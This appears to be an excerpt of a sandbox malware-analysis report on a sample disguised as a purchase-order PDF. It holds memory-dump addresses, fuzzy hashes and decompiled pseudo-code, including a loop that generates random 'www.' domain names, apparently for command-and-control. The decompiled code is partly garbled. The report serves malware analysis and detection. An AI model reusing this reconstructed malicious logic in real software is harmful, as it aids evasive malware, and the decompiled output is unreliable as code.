0x00a8ff3a
0x00a8ff3d
0x00a8ff41
0x00a8ff47
0x00a8ff47
0x00a8ff4f
0x00a8ff52
0x00a8ff54
0x00a8ff56
0x00a8ff5c
0x00a8ff5f
0x00a8ff5f
0x00a8ff64
0x00a8ff66
0x00a8ff6a
0x00a8ff6a
0x00a8ff6e
0x00a8ff41
0x00000000
0x00a4f6e7
0x00a4f6a0
0x00a4f612
0x00a4f614
0x00a4f618
0x00a4f620
0x00a4f67a
0x00a4f67f
0x00a4f622
0x00a4f628
0x00a4f628
0x00a4f632
0x00a8ff84
0x00a8ff84
0x00a8ff8c
0x00a8ff93
0x00a8ffa0
0x00a8ffa5
0x00a8ffb0
0x00a8ffb5
0x00a8ffb7
0x00a8ffba
0x00a8ffbd
0x00a8ffc4
0x00a8ffc4
0x00a8ffbf
0x00a8ffbf
0x00a8ffbf
0x00a8ffc6
0x00a8ffc7
0x00a8ffc8
0x00a8ffcb
0x00a8ffda
0x00a8ffdf
0x00a8ffe2
0x00a8ffe3
0x00a8ffe5
0x00a8ffee
0x00a8fff0
0x00a8fff3
0x00a8fff5
0x00a8fffb
0x00a8fffd
0x00a90001
0x00a90003
0x00a90003
0x00a90001
0x00a8fffb
0x00a90008
0x00a9000d
0x00a9000f
0x00a90011
0x00a90015
0x00a9001a
0x00a9001e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a4f638
0x00a4f638
0x00a4f63a
0x00a4f63e
0x00a4f572
0x00a4f647
0x00a4f64c
0x00000000
0x00000000
0x00000000
0x00a4f64c

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A8FFD1
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A8FFA7
RTL: Re-Waiting, xrefs: 00A90008

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 21b5d865bd034c40bc1aa9828a305e1825bec53469c6e7d3a30f8ed63818391c
Instruction ID: e64f654ed9018037c40037cf8e25dfd90c3c58fb9c9a041b43237411d5509138
Opcode Fuzzy Hash: 21b5d865bd034c40bc1aa9828a305e1825bec53469c6e7d3a30f8ed63818391c
Instruction Fuzzy Hash: A9E1BB356087829FDB25CF28C985B2AB7F0BB85324F240A2DF5A58B2E1D774DD44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00417D59 Relevance: 4.1, Strings: 3, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00417D59(signed int __eax, void* __ebx, signed int __ecx, void* __edx, void* __esi) {
				void* __edi;
				signed int _t133;
				char _t136;
				void* _t146;
				signed int _t151;
				intOrPtr _t166;
				intOrPtr _t208;
				signed int _t212;
				void* _t265;
				signed int _t269;
				intOrPtr _t270;
				signed int _t272;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t282;

				_t133 = __eax;
				asm("das");
				 *0x670b5c3d = __eax;
				0x6eade830();
				 *(__eax + __ebx) =  *(__eax + __ebx) ^ __ecx;
				 *(__edx + 0x6a) =  *(__edx + 0x6a) ^ _t272;
				asm("popad");
				asm("aas");
				asm("adc ecx, [edx]");
				_t273 = _t272 - 1;
				if(_t273 >= 0) {
					__eflags = __eax & 0xc650006a;
					_t275 = _t273 + 2;
					__eflags = __eax & 0x00000000;
					E0041BE50();
					__eflags = 0;
					_t279 = _t278 + 0xc;
					 *((char*)(_t275 - 0x10)) = 0;
					 *((intOrPtr*)(_t275 - 0xf)) = 0;
					goto L8;
				} else {
					__eax =  *0xd0989e02;
					if(__eflags >= 0) {
						L8:
						 *((short*)(_t275 - 0xb)) = 0;
						goto L9;
					} else {
						__eflags = __cl - __ah;
						asm("lodsd");
						__eflags = __ch;
						__ebx = __ebx - 1;
						_t5 = __eax;
						__eax = __ebp;
						__ebp = _t5;
						__ecx = __edi;
						asm("outsd");
						__esp = __esp + 1;
						__esp = __esp |  *(__edi + 0x258c24c4);
						__eflags = __esp;
						ss =  *((intOrPtr*)(__eax - 0x568099b));
						if(__eflags <= 0) {
							L9:
							_t276 = _t275 + 1;
							asm("cmc");
							 *((char*)(_t276 - 9)) = 0;
							_t269 = 0;
							__eflags = 0;
							do {
								_t136 = E0040A470(__eflags, 0x4e, 0x8d);
								_t279 = _t279 + 8;
								_t212 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _t136 -  *((intOrPtr*)(_t276 + _t212 - 0x10));
									if(_t136 ==  *((intOrPtr*)(_t276 + _t212 - 0x10))) {
										goto L16;
									}
									_t212 = _t212 + 1;
									__eflags = _t212 - _t269;
									if(_t212 <= _t269) {
										continue;
									} else {
										__eflags = _t136;
										if(_t136 != 0) {
											 *((char*)(_t276 + _t269 - 0x10)) = _t136;
											_t269 = _t269 + 1;
											__eflags = _t269;
										}
									}
									goto L16;
								}
								L16:
								__eflags = _t269 - 8;
							} while (__eflags < 0);
							 *((intOrPtr*)(_t276 - 8)) = 0x2e777777;
							 *((char*)(_t276 - 4)) = 0;
							 *((short*)(_t276 - 3)) = 0;
							 *((char*)(_t276 - 1)) = 0;
							 *((char*)(_t276 - 0x98)) = 0;
							E0041BE50(_t276 - 0x97, 0, 0x3f);
							_push(E0040A470(__eflags, 2, 5) & 0x000000ff);
							_push(_t276 - 0x98);
							E0041C700();
							 *((char*)(_t276 + E0041C0A0(_t276 - 0x98) - 0x98)) = 0x3d;
							_push(E0040A470(__eflags, 4, 0x10) & 0x000000ff);
							_push(_t276 + E0041C0A0(_t276 - 0x98) - 0x98);
							_t146 = E0041C700();
							_t34 = _t276 + 8; // 0x2e777777
							_t270 =  *_t34;
							_t208 = 0;
							_t282 = _t279 + 0x34;
							 *((intOrPtr*)(_t276 - 0x14)) = 0;
							_t265 = 0;
							do {
								__eflags =  *((intOrPtr*)(_t270 + 0x1164)) - _t208;
								if( *((intOrPtr*)(_t270 + 0x1164)) != _t208) {
									E0041BE00(_t276 - 0x58, 0x2e);
									 *((short*)(_t276 - 0x308)) = 0;
									E0041BE50(_t276 - 0x306, 0, 0x206);
									E0041BE00( *((intOrPtr*)(_t270 + 0x14a0)) + _t265, 0x388);
									_t151 = E0041C3C0();
									_t42 = _t208 - 1; // -1
									 *( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x40) = _t151 * _t42 & 0x00000001;
									E0041BDD0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x87, _t276 - 0x98, E0041C0A0(_t276 - 0x98));
									_t50 = _t276 - 8; // 0x2e777777
									E0041BDD0(_t276 - 0x58, _t50, 4);
									_push(4);
									E0040AFA0(_t208, _t270, __eflags, _t270, _t276 + E0041C0A0(_t276 - 0x58) - 0x58,  *(_t276 + _t208 - 0x10) & 0x000000ff);
									E0041BDD0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265, _t276 - 0x58, E0041C0A0(_t276 - 0x58));
									_t166 = E0041C0A0(_t276 - 0x58);
									_t210 = _t270 + 0xe90;
									 *((intOrPtr*)(_t276 - 0x18)) = _t166;
									E0041C1D0(_t276 - 0x58, _t270 + 0xe90, 0);
									E00409E10(_t276 - 0x100);
									E0040AB60(_t276 - 0x100, _t276 - 0x58, E0041C0A0(_t276 - 0x58));
									E0040AB30(_t276 - 0x100);
									E0041BDD0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x72, _t276 - 0x100, 0x14);
									 *((char*)(_t276 +  *((intOrPtr*)(_t276 - 0x18)) - 0x58)) = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x4c)) = 2;
									 *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x50)) = 1;
									E0040B030(_t270 + 0xe90, _t270, __eflags, _t270, _t276 - 0x308, 0x41, 1);
									E0041C470( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7, _t276 - 0x308);
									E0040B030(_t270 + 0xe90, _t270, __eflags, _t270, _t276 - 0x308, 0x42, 1);
									E0041C470(E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7) +  *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7, _t276 - 0x308);
									E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0xc7, _t276 - 0x58, 0);
									E0040B030(_t210, _t270, __eflags, _t270, _t276 - 0x308, 0x45, 1);
									E0041C470( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167, _t276 - 0x308);
									E0040B030(_t210, _t270, __eflags, _t270, _t276 - 0x308, 0x46, 1);
									E0041C470(E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167) +  *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167, _t276 - 0x308);
									E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x167, _t276 - 0x58, 0);
									E0040B030(_t210, _t270, __eflags, _t270, _t276 - 0x308, 0x4a, 1);
									__eflags = E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287) +  *((intOrPtr*)(_t270 + 0x14a0));
									E0041C470(E0041C0A0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287) +  *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287, _t276 - 0x308);
									E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287, _t276 - 0x58, 0);
									_t146 = E0041C1D0( *((intOrPtr*)(_t270 + 0x14a0)) + _t265 + 0x287, _t210, 0);
									_t208 =  *((intOrPtr*)(_t276 - 0x14));
									_t282 = _t282 + 0x144;
								}
								_t208 = _t208 + 1;
								_t265 = _t265 + 0x388;
								 *((intOrPtr*)(_t276 - 0x14)) = _t208;
								__eflags = _t265 - 0x1c40;
							} while (_t265 < 0x1c40);
							return _t146;
						} else {
							if(__eflags <= 0) {
								return _t133;
							} else {
								_pop(__esp);
								asm("clc");
								asm("loop 0xffffffb8");
								__esp = __esp - 1;
								asm("aad 0xd9");
								_t8 = __eax;
								__eax = __edx;
								__edx = _t8;
								_pop(__esp);
								asm("loopne 0x62");
								__eflags = __eax - 0x5f9a7a0c;
								_pop(__edi);
								_pop(__ebx);
								__esp = __ebp;
								_pop(__ebp);
								return __eax;
							}
						}
					}
				}
			}

0x00417d59
0x00417d5b
0x00417d5c
0x00417d61
0x00417d66
0x00417d69
0x00417d6d
0x00417d70
0x00417d71
0x00417d73
0x00417d74
0x00417dd0
0x00417dd5
0x00417dd6
0x00417dd8
0x00417ddd
0x00417ddf
0x00417de2
0x00417de6
0x00000000
0x00417d76
0x00417d78
0x00417d7d
0x00417de9
0x00417de9
0x00000000
0x00417d7f
0x00417d7f
0x00417d81
0x00417d82
0x00417d84
0x00417d86
0x00417d86
0x00417d86
0x00417d89
0x00417d8a
0x00417d8b
0x00417d8c
0x00417d8c
0x00417d94
0x00417d9a
0x00417deb
0x00417deb
0x00417dec
0x00417ded
0x00417df0
0x00417df0
0x00417df2
0x00417df9
0x00417dfe
0x00417e01
0x00417e01
0x00417e03
0x00417e03
0x00417e07
0x00000000
0x00000000
0x00417e09
0x00417e0a
0x00417e0c
0x00000000
0x00417e0e
0x00417e0e
0x00417e10
0x00417e12
0x00417e16
0x00417e16
0x00417e16
0x00417e10
0x00000000
0x00417e0c
0x00417e17
0x00417e17
0x00417e17
0x00417e28
0x00417e2f
0x00417e33
0x00417e37
0x00417e3a
0x00417e40
0x00417e51
0x00417e58
0x00417e59
0x00417e6e
0x00417e81
0x00417e98
0x00417e99
0x00417e9e
0x00417e9e
0x00417ea1
0x00417ea3
0x00417ea6
0x00417ea9
0x00417eb0
0x00417eb0
0x00417eb6
0x00417ec2
0x00417ed6
0x00417edd
0x00417ef0
0x00417ef5
0x00417f00
0x00417f09
0x00417f2f
0x00417f36
0x00417f3e
0x00417f4b
0x00417f60
0x00417f7c
0x00417f85
0x00417f8c
0x00417f97
0x00417f9a
0x00417fa6
0x00417fc0
0x00417fcf
0x00417fe8
0x00417ff6
0x00418005
0x00418015
0x0041801d
0x00418037
0x00418048
0x0041807b
0x00418094
0x004180a5
0x004180bf
0x004180d0
0x00418103
0x0041811c
0x0041812d
0x0041814f
0x00418160
0x00418179
0x0041818f
0x00418194
0x00418197
0x00418197
0x0041819a
0x0041819b
0x004181a1
0x004181a4
0x004181a4
0x004181b6
0x00417d9c
0x00417d9c
0x00417d54
0x00417d9e
0x00417d9e
0x00417d9f
0x00417da0
0x00417da2
0x00417da3
0x00417da6
0x00417da6
0x00417da6
0x00417da7
0x00417da8
0x00417daa
0x00417db3
0x00417db5
0x00417db6
0x00417db8
0x00417db9
0x00417db9
0x00417d9c
0x00417d9a
0x00417d7d

Strings

www., xrefs: 00417F36, 00417F39
www., xrefs: 00417E9E, 00417F5F, 00418014, 00418047, 004180A4, 004180CF, 0041812C
=, xrefs: 00417E6E

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID: =$www.$www.
API String ID: 0-3343787489
Opcode ID: 8a944a9b402d0d0ed6a3a3ef3331b2e971090a9b4d61c8070f3ce8e7ca7e0f04
Instruction ID: 9399eecbde9e477954d2b2faad7fa9a924461dd1ea6b35e22424a4e98376033e
Opcode Fuzzy Hash: 8a944a9b402d0d0ed6a3a3ef3331b2e971090a9b4d61c8070f3ce8e7ca7e0f04
Instruction Fuzzy Hash: E4C10871944308AADB14DBF0CC82FEB7779AF44308F40455EF6595B182DB78A684CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00417DBA Relevance: 4.1, Strings: 3, Instructions: 332
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00417DBA(void* __eflags, char _a1, char _a8) {
				char _v1;
				short _v3;
				char _v4;
				char _v8;
				signed char _v9;
				short _v15;
				intOrPtr _v19;
				char _v20;
				intOrPtr _v24;
				void* _v87;
				char _v88;
				char _v151;
				char _v152;
				char _v256;
				char _v774;
				char _v776;
				void* __ebx;
				signed int __esi;
				signed int __ebp;
				void* _t130;
				char _t131;
				void* _t141;
				signed int _t146;
				intOrPtr _t161;
				intOrPtr _t202;
				signed int _t205;
				void* _t258;
				signed int _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t265;
				void* _t268;

				if(__eflags <= 0) {
					L15:
					_t260 = _t260 + 1;
					__eflags = _t260;
					goto L16;
				} else {
					asm("lodsb");
					if(__eflags == 0) {
						__ebx = __ebx - 1;
						_push(__edi);
						_t1 = __eax;
						__eax = __ebp;
						__ebp = _t1;
						__al = __al ^ 0x000000e1;
						asm("outsd");
						__esp = __esp + 1;
						__esp = __esp |  *(__edi + 0x258c24c4);
						__eflags = __esp;
						__al = 0x61;
						ss =  *((intOrPtr*)(__eax - 0x568099b));
						if(__eflags <= 0) {
							goto L9;
						} else {
							if(__eflags <= 0) {
								return _t130;
							} else {
								_pop(__esp);
								asm("clc");
								asm("loop 0xffffffb8");
								__esp = __esp - 1;
								asm("aad 0xd9");
								_t4 = __eax;
								__eax = __edx;
								__edx = _t4;
								_pop(__esp);
								asm("loopne 0x62");
								__eflags = __eax - 0x5f9a7a0c;
								_pop(__edi);
								_pop(__ebx);
								__esp = __ebp;
								_pop(__ebp);
								return __eax;
							}
						}
					} else {
						_push(__ebp);
						__ebp = __esp;
						__esp = __esp - 0x308;
						_push(__ebx);
						_push(__edi);
						_push(0x3f);
						__eax =  &_v87;
						__ebp =  &_v3;
						__eflags =  &_v87 & 0xc650006a;
						__ebp =  &_v3;
						__eflags = __al & 0x00000000;
						E0041BE50() = 0;
						__eflags = 0;
						__esp = __esp + 0xc;
						_v20 = 0;
						_v19 = 0;
						_v15 = __ax;
						L9:
						__ebp =  &_a1;
						asm("cmc");
						_v9 = __al;
						__esi = 0;
						__eflags = 0;
						L10:
						_t131 = E0040A470(__eflags, 0x4e, 0x8d);
						_t265 = _t265 + 8;
						_t205 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t131 -  *((intOrPtr*)(_t263 + _t205 - 0x10));
							if(_t131 ==  *((intOrPtr*)(_t263 + _t205 - 0x10))) {
								break;
							}
							_t205 = _t205 + 1;
							__eflags = _t205 - _t260;
							if(_t205 <= _t260) {
								continue;
							} else {
								__eflags = _t131;
								if(_t131 != 0) {
									 *((char*)(_t263 + _t260 - 0x10)) = _t131;
									goto L15;
								}
							}
							break;
						}
						L16:
						__eflags = _t260 - 8;
						if(__eflags < 0) {
							goto L10;
						}
						_v8 = 0x2e777777;
						_v4 = 0;
						_v3 = 0;
						_v1 = 0;
						_v152 = 0;
						E0041BE50( &_v151, 0, 0x3f);
						_push(E0040A470(__eflags, 2, 5) & 0x000000ff);
						_push( &_v152);
						E0041C700();
						 *((char*)(_t263 + E0041C0A0( &_v152) - 0x98)) = 0x3d;
						_push(E0040A470(__eflags, 4, 0x10) & 0x000000ff);
						_push(_t263 + E0041C0A0( &_v152) - 0x98);
						_t141 = E0041C700();
						_t31 =  &_a8; // 0x2e777777
						_t261 =  *_t31;
						_t202 = 0;
						_t268 = _t265 + 0x34;
						_v20 = 0;
						_t258 = 0;
						do {
							__eflags =  *((intOrPtr*)(_t261 + 0x1164)) - _t202;
							if( *((intOrPtr*)(_t261 + 0x1164)) != _t202) {
								E0041BE00( &_v88, 0x2e);
								_v776 = 0;
								E0041BE50( &_v774, 0, 0x206);
								E0041BE00( *((intOrPtr*)(_t261 + 0x14a0)) + _t258, 0x388);
								_t146 = E0041C3C0();
								_t39 = _t202 - 1; // -1
								 *( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x40) = _t146 * _t39 & 0x00000001;
								E0041BDD0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x87,  &_v152, E0041C0A0( &_v152));
								_t47 =  &_v8; // 0x2e777777
								E0041BDD0( &_v88, _t47, 4);
								_push(4);
								E0040AFA0(_t202, _t261, __eflags, _t261, _t263 + E0041C0A0( &_v88) - 0x58,  *(_t263 + _t202 - 0x10) & 0x000000ff);
								E0041BDD0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258,  &_v88, E0041C0A0( &_v88));
								_t161 = E0041C0A0( &_v88);
								_t204 = _t261 + 0xe90;
								_v24 = _t161;
								E0041C1D0( &_v88, _t261 + 0xe90, 0);
								E00409E10( &_v256);
								E0040AB60( &_v256,  &_v88, E0041C0A0( &_v88));
								E0040AB30( &_v256);
								E0041BDD0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x72,  &_v256, 0x14);
								 *((char*)(_t263 + _v24 - 0x58)) = 0;
								 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x4c)) = 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x50)) = 1;
								E0040B030(_t261 + 0xe90, _t261, __eflags, _t261,  &_v776, 0x41, 1);
								E0041C470( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7,  &_v776);
								E0040B030(_t261 + 0xe90, _t261, __eflags, _t261,  &_v776, 0x42, 1);
								E0041C470(E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7) +  *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7,  &_v776);
								E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0xc7,  &_v88, 0);
								E0040B030(_t204, _t261, __eflags, _t261,  &_v776, 0x45, 1);
								E0041C470( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167,  &_v776);
								E0040B030(_t204, _t261, __eflags, _t261,  &_v776, 0x46, 1);
								E0041C470(E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167) +  *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167,  &_v776);
								E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x167,  &_v88, 0);
								E0040B030(_t204, _t261, __eflags, _t261,  &_v776, 0x4a, 1);
								__eflags = E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287) +  *((intOrPtr*)(_t261 + 0x14a0));
								E0041C470(E0041C0A0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287) +  *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287,  &_v776);
								E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287,  &_v88, 0);
								_t141 = E0041C1D0( *((intOrPtr*)(_t261 + 0x14a0)) + _t258 + 0x287, _t204, 0);
								_t202 = _v20;
								_t268 = _t268 + 0x144;
							}
							_t202 = _t202 + 1;
							_t258 = _t258 + 0x388;
							_v20 = _t202;
							__eflags = _t258 - 0x1c40;
						} while (_t258 < 0x1c40);
						return _t141;
					}
				}
			}

0x00417dbb
0x00417e16
0x00417e16
0x00417e16
0x00000000
0x00417dbd
0x00417dbd
0x00417dbe
0x00417d84
0x00417d85
0x00417d86
0x00417d86
0x00417d86
0x00417d87
0x00417d8a
0x00417d8b
0x00417d8c
0x00417d8c
0x00417d92
0x00417d94
0x00417d9a
0x00000000
0x00417d9c
0x00417d9c
0x00417d54
0x00417d9e
0x00417d9e
0x00417d9f
0x00417da0
0x00417da2
0x00417da3
0x00417da6
0x00417da6
0x00417da6
0x00417da7
0x00417da8
0x00417daa
0x00417db3
0x00417db5
0x00417db6
0x00417db8
0x00417db9
0x00417db9
0x00417d9c
0x00417dc0
0x00417dc0
0x00417dc1
0x00417dc3
0x00417dc9
0x00417dcb
0x00417dcc
0x00417dce
0x00417dcf
0x00417dd0
0x00417dd5
0x00417dd6
0x00417ddd
0x00417ddd
0x00417ddf
0x00417de2
0x00417de6
0x00417de9
0x00417deb
0x00417deb
0x00417dec
0x00417ded
0x00417df0
0x00417df0
0x00417df2
0x00417df9
0x00417dfe
0x00417e01
0x00417e01
0x00417e03
0x00417e03
0x00417e07
0x00000000
0x00000000
0x00417e09
0x00417e0a
0x00417e0c
0x00000000
0x00417e0e
0x00417e0e
0x00417e10
0x00417e12
0x00000000
0x00417e12
0x00417e10
0x00000000
0x00417e0c
0x00417e17
0x00417e17
0x00417e1a
0x00000000
0x00000000
0x00417e28
0x00417e2f
0x00417e33
0x00417e37
0x00417e3a
0x00417e40
0x00417e51
0x00417e58
0x00417e59
0x00417e6e
0x00417e81
0x00417e98
0x00417e99
0x00417e9e
0x00417e9e
0x00417ea1
0x00417ea3
0x00417ea6
0x00417ea9
0x00417eb0
0x00417eb0
0x00417eb6
0x00417ec2
0x00417ed6
0x00417edd
0x00417ef0
0x00417ef5
0x00417f00
0x00417f09
0x00417f2f
0x00417f36
0x00417f3e
0x00417f4b
0x00417f60
0x00417f7c
0x00417f85
0x00417f8c
0x00417f97
0x00417f9a
0x00417fa6
0x00417fc0
0x00417fcf
0x00417fe8
0x00417ff6
0x00418005
0x00418015
0x0041801d
0x00418037
0x00418048
0x0041807b
0x00418094
0x004180a5
0x004180bf
0x004180d0
0x00418103
0x0041811c
0x0041812d
0x0041814f
0x00418160
0x00418179
0x0041818f
0x00418194
0x00418197
0x00418197
0x0041819a
0x0041819b
0x004181a1
0x004181a4
0x004181a4
0x004181b6
0x004181b6
0x00417dbe

Strings

www., xrefs: 00417F36, 00417F39
www., xrefs: 00417E9E, 00417F5F, 00418014, 00418047, 004180A4, 004180CF, 0041812C
=, xrefs: 00417E6E

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID: =$www.$www.
API String ID: 0-3343787489
Opcode ID: b76590bac70fb8f4ea37fdd1d6f1b4d20e8c6e2921ca3651e162067a57bc2f42
Instruction ID: 21e62ffafc17393f92fbf02c5aaee946e2e31f17f34cd70437b64aca7f0b3693
Opcode Fuzzy Hash: b76590bac70fb8f4ea37fdd1d6f1b4d20e8c6e2921ca3651e162067a57bc2f42
Instruction Fuzzy Hash: 1DC1D972944308AADB14DBF0CC82FEF777DAF44708F40455EB25957182DA78A684CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00417317 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8436db17f74422f808355b62420446ace938b1f1e264b8164da6e6704c86cb
Instruction ID: 77344f3c8e1c3f2b142b95e803c083439d94a431ed2d488ad31fd13f123a523f
Opcode Fuzzy Hash: df8436db17f74422f808355b62420446ace938b1f1e264b8164da6e6704c86cb
Instruction Fuzzy Hash: A8C09B27E4C15515C6552D5574114F5F774D683269F2032FBDD58B750141038433A57C

Uniqueness

Uniqueness Score: -1.00%

Function 00A64230 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba1a944b3024a26791cb308013057ac68e935aeb56752517a9ff9ba04c094d99
Instruction ID: 171baf67410d92bc86e0e30b2307a6f9093af5132fd6662712e54f5323e7dee4
Opcode Fuzzy Hash: ba1a944b3024a26791cb308013057ac68e935aeb56752517a9ff9ba04c094d99
Instruction Fuzzy Hash: 0590023165544012924471584C88547400997E0342B61C021E0865594CCE1889565362

Uniqueness

Uniqueness Score: -1.00%

Function 00A29006 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00A29006(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0xafbce8);
				L00A77B20(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				L00A68F30(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = L00A39830(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0xb165e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E00A3A130(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = L00A45A10(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || L00A40490(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0xb165e0; // 0x7555a680
							 *0xb191e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
